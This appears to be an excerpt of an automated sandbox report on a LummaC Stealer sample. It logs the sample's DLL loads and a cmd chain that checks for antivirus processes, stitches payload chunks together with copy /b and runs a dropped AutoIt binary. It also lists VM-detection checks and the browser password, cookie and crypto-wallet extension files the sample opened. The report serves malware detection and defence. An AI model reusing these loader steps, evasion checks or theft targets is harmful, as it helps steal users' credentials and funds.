      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: LVDdWBGnVE.exeStatic file information: File size 1294445 > 1048576
      Source: LVDdWBGnVE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: LVDdWBGnVE.exeStatic PE information: real checksum: 0x13aed5 should be: 0x14afb9

      Persistence and Installation Behavior

      barindex
      Drops PE files with a suspicious file extension
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\370821\Sale.comJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\370821\Sale.comJump to dropped file
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Query firmware table information (likely to detect VMs)
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.com TID: 6460Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\370821\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\370821Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Campbell Campbell.cmd & Campbell.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 370821Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Anchor" Veterinary Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Genre + ..\Mj + ..\Discs + ..\Receiving + ..\Mysterious + ..\Aka wJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\370821\Sale.com Sale.com wJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: Sale.com, 0000000B.00000000.2156019471.00000000008B3000.00000002.00000001.01000000.00000007.sdmp, Sale.com.2.dr, Ejaculation.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\LVDdWBGnVE.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
